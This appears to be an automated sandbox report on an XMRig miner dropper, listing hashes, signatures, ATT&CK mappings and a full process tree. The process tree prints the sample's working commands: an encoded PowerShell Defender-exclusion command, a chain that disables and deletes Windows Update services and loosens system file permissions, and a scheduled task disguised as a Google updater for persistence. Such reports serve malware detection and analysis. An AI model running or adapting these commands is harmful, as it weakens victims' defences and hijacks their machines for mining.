Analysis

  • max time kernel
    89s
  • max time network
    73s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    18-05-2022 21:09

General

  • Target

    003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe

  • Size

    4.1MB

  • MD5

    c1fd183c8ef30db8e2be4ab51e42501f

  • SHA1

    67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

  • SHA256

    003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

  • SHA512

    8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 56 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe
    "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3496
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4948
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:5028
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:4864
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:1260
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:2032
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:2796
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:2948
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:4960
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:4988
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:1580
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:5112
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4100
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:3468
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:4132
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:1716
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:4628
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:4608
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    4⤵
                      PID:3944
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      4⤵
                        PID:3912
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        4⤵
                          PID:4224
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          4⤵
                            PID:3784
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            4⤵
                              PID:3780
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              4⤵
                                PID:3032
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:2084
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3520
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:4848
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3192
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  4⤵
                                    PID:4280
                            • C:\Program Files\Chrome\updater.exe
                              "C:\Program Files\Chrome\updater.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:8
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                2⤵
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Drops file in Program Files directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:976
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
                                  3⤵
                                    PID:4148
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
                                      4⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1840
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    3⤵
                                      PID:2376
                                      • C:\Windows\system32\sc.exe
                                        sc stop UsoSvc
                                        4⤵
                                          PID:4532
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          4⤵
                                            PID:4160
                                          • C:\Windows\system32\sc.exe
                                            sc stop wuauserv
                                            4⤵
                                              PID:4412
                                            • C:\Windows\system32\sc.exe
                                              sc stop bits
                                              4⤵
                                                PID:4400
                                              • C:\Windows\system32\sc.exe
                                                sc stop dosvc
                                                4⤵
                                                  PID:4372
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2168
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4592
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4600
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4556
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:3808
                                                • C:\Windows\system32\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4584
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:4896
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2700
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4944
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:5020
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:4864
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  4⤵
                                                    PID:2240
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                    4⤵
                                                      PID:2952
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      4⤵
                                                        PID:4928
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                        4⤵
                                                          PID:2948
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                          4⤵
                                                            PID:4960
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                            4⤵
                                                              PID:4988
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              4⤵
                                                                PID:1580
                                                            • C:\Windows\System32\conhost.exe
                                                              C:\Windows\System32\conhost.exe
                                                              3⤵
                                                                PID:356
                                                                • C:\Windows\System32\conhost.exe
                                                                  "C:\Windows\System32\conhost.exe" "wknkxnouyh"
                                                                  4⤵
                                                                    PID:3468
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe fffmrxkhevshsdek0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB6PB4TwHRdp5kOUybEcdYHFAhdUtiJ4KO+eYtq99cAs745QzaReMwKP0mBN9oMgdGhbI95+lAZBArBG1zgJG5b4GWFxfPtcy6WibtQFHOO2LexogLgCFNuU5CfXb28u22O7RtF8L1LLcQ11YdQfCpDvwswZSKmpzevICegb9KLIb3BMZYsJxOjUu7n990KBMZSyacB1V6bp6H6KpdSvkmxbcR2MioAEmbhhvA0Uadya6OEWZ3XLzaEiN12Iih4TE1mSJoZzt/auX1Ah8NcTZE/cyzd6u6Ke9xMHhy3B6Do54G9zHxCyzsFTagYSi2oNtHSwUHyLAZuA1VH0i89Htg+I+1qNuZcSQa52vl/B1NwmuGJ8bSYQ1Y84EKkpWNeAYba5l4yK+VXH9FKP0fJCGCyHnsBdn/mdlNErmLlJMZU68eyziKpgrg+yoyvbBkxzCN9LsvaewiEOrRVZ+MaTIxwc7gja3bR6jqBMbKRYvC72G
                                                                  3⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5116

                                                            Network

                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                            Execution

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Persistence

                                                            Modify Existing Service

                                                            2
                                                            T1031

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Privilege Escalation

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Defense Evasion

                                                            Modify Registry

                                                            2
                                                            T1112

                                                            Impair Defenses

                                                            1
                                                            T1562

                                                            File Permissions Modification

                                                            1
                                                            T1222

                                                            Impact

                                                            Service Stop

                                                            1
                                                            T1489

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files\Chrome\updater.exe
                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              c1fd183c8ef30db8e2be4ab51e42501f

                                                              SHA1

                                                              67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

                                                              SHA256

                                                              003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

                                                              SHA512

                                                              8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

                                                            • C:\Program Files\Chrome\updater.exe
                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              c1fd183c8ef30db8e2be4ab51e42501f

                                                              SHA1

                                                              67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

                                                              SHA256

                                                              003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

                                                              SHA512

                                                              8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                              Filesize

                                                              539B

                                                              MD5

                                                              84f2160705ac9a032c002f966498ef74

                                                              SHA1

                                                              e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                              SHA256

                                                              7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                              SHA512

                                                              f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                            • memory/356-364-0x0000000000400000-0x000000000040C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/356-370-0x0000000000400000-0x000000000040C000-memory.dmp
                                                              Filesize

                                                              48KB

                                                            • memory/356-365-0x0000000000401BEA-mapping.dmp
                                                            • memory/976-373-0x00000205AC870000-0x00000205AC882000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/976-360-0x00000205AC700000-0x00000205AC706000-memory.dmp
                                                              Filesize

                                                              24KB

                                                            • memory/1260-169-0x0000000000000000-mapping.dmp
                                                            • memory/1580-385-0x0000000000000000-mapping.dmp
                                                            • memory/1580-175-0x0000000000000000-mapping.dmp
                                                            • memory/1716-182-0x0000000000000000-mapping.dmp
                                                            • memory/1840-262-0x00000240EC860000-0x00000240EC86A000-memory.dmp
                                                              Filesize

                                                              40KB

                                                            • memory/1840-223-0x00000240EC840000-0x00000240EC85C000-memory.dmp
                                                              Filesize

                                                              112KB

                                                            • memory/1840-208-0x0000000000000000-mapping.dmp
                                                            • memory/1840-229-0x00000240ECEC0000-0x00000240ECF79000-memory.dmp
                                                              Filesize

                                                              740KB

                                                            • memory/2032-170-0x0000000000000000-mapping.dmp
                                                            • memory/2084-191-0x0000000000000000-mapping.dmp
                                                            • memory/2132-121-0x0000020831630000-0x0000020831A4A000-memory.dmp
                                                              Filesize

                                                              4.1MB

                                                            • memory/2132-129-0x0000020816540000-0x000002081695B000-memory.dmp
                                                              Filesize

                                                              4.1MB

                                                            • memory/2168-359-0x0000000000000000-mapping.dmp
                                                            • memory/2240-379-0x0000000000000000-mapping.dmp
                                                            • memory/2376-353-0x0000000000000000-mapping.dmp
                                                            • memory/2688-128-0x0000000000000000-mapping.dmp
                                                            • memory/2700-375-0x0000000000000000-mapping.dmp
                                                            • memory/2796-171-0x0000000000000000-mapping.dmp
                                                            • memory/2948-172-0x0000000000000000-mapping.dmp
                                                            • memory/2948-382-0x0000000000000000-mapping.dmp
                                                            • memory/2952-380-0x0000000000000000-mapping.dmp
                                                            • memory/3032-190-0x0000000000000000-mapping.dmp
                                                            • memory/3192-192-0x0000000000000000-mapping.dmp
                                                            • memory/3468-401-0x000001F573310000-0x000001F573316000-memory.dmp
                                                              Filesize

                                                              24KB

                                                            • memory/3468-178-0x0000000000000000-mapping.dmp
                                                            • memory/3468-404-0x000001F572BF0000-0x000001F572BF7000-memory.dmp
                                                              Filesize

                                                              28KB

                                                            • memory/3496-130-0x0000000000000000-mapping.dmp
                                                            • memory/3496-135-0x00000205FB9B0000-0x00000205FB9D2000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/3496-138-0x00000205FBB60000-0x00000205FBBD6000-memory.dmp
                                                              Filesize

                                                              472KB

                                                            • memory/3520-179-0x0000000000000000-mapping.dmp
                                                            • memory/3780-189-0x0000000000000000-mapping.dmp
                                                            • memory/3784-188-0x0000000000000000-mapping.dmp
                                                            • memory/3808-366-0x0000000000000000-mapping.dmp
                                                            • memory/3912-186-0x0000000000000000-mapping.dmp
                                                            • memory/3944-185-0x0000000000000000-mapping.dmp
                                                            • memory/4100-177-0x0000000000000000-mapping.dmp
                                                            • memory/4132-181-0x0000000000000000-mapping.dmp
                                                            • memory/4148-207-0x0000000000000000-mapping.dmp
                                                            • memory/4160-355-0x0000000000000000-mapping.dmp
                                                            • memory/4224-187-0x0000000000000000-mapping.dmp
                                                            • memory/4280-194-0x0000000000000000-mapping.dmp
                                                            • memory/4372-358-0x0000000000000000-mapping.dmp
                                                            • memory/4400-357-0x0000000000000000-mapping.dmp
                                                            • memory/4412-356-0x0000000000000000-mapping.dmp
                                                            • memory/4532-354-0x0000000000000000-mapping.dmp
                                                            • memory/4556-363-0x0000000000000000-mapping.dmp
                                                            • memory/4584-371-0x0000000000000000-mapping.dmp
                                                            • memory/4592-361-0x0000000000000000-mapping.dmp
                                                            • memory/4600-362-0x0000000000000000-mapping.dmp
                                                            • memory/4608-184-0x0000000000000000-mapping.dmp
                                                            • memory/4628-183-0x0000000000000000-mapping.dmp
                                                            • memory/4848-180-0x0000000000000000-mapping.dmp
                                                            • memory/4864-378-0x0000000000000000-mapping.dmp
                                                            • memory/4864-168-0x0000000000000000-mapping.dmp
                                                            • memory/4896-372-0x0000000000000000-mapping.dmp
                                                            • memory/4928-381-0x0000000000000000-mapping.dmp
                                                            • memory/4944-376-0x0000000000000000-mapping.dmp
                                                            • memory/4948-166-0x0000000000000000-mapping.dmp
                                                            • memory/4960-173-0x0000000000000000-mapping.dmp
                                                            • memory/4960-383-0x0000000000000000-mapping.dmp
                                                            • memory/4988-384-0x0000000000000000-mapping.dmp
                                                            • memory/4988-174-0x0000000000000000-mapping.dmp
                                                            • memory/5020-377-0x0000000000000000-mapping.dmp
                                                            • memory/5028-167-0x0000000000000000-mapping.dmp
                                                            • memory/5112-176-0x0000000000000000-mapping.dmp
                                                            • memory/5116-390-0x0000000140000000-0x0000000140803000-memory.dmp
                                                              Filesize

                                                              8.0MB

                                                            • memory/5116-391-0x0000000000410000-0x0000000000430000-memory.dmp
                                                              Filesize

                                                              128KB

                                                            • memory/5116-392-0x0000000140000000-0x0000000140803000-memory.dmp
                                                              Filesize

                                                              8.0MB

                                                            • memory/5116-395-0x0000000000000000-0x0000000001000000-memory.dmp
                                                              Filesize

                                                              16.0MB

                                                            • memory/5116-389-0x0000000140000000-0x0000000140803000-memory.dmp
                                                              Filesize

                                                              8.0MB

                                                            • memory/5116-386-0x0000000140000000-0x0000000140803000-memory.dmp
                                                              Filesize

                                                              8.0MB

                                                            • memory/5116-387-0x000000014036DB84-mapping.dmp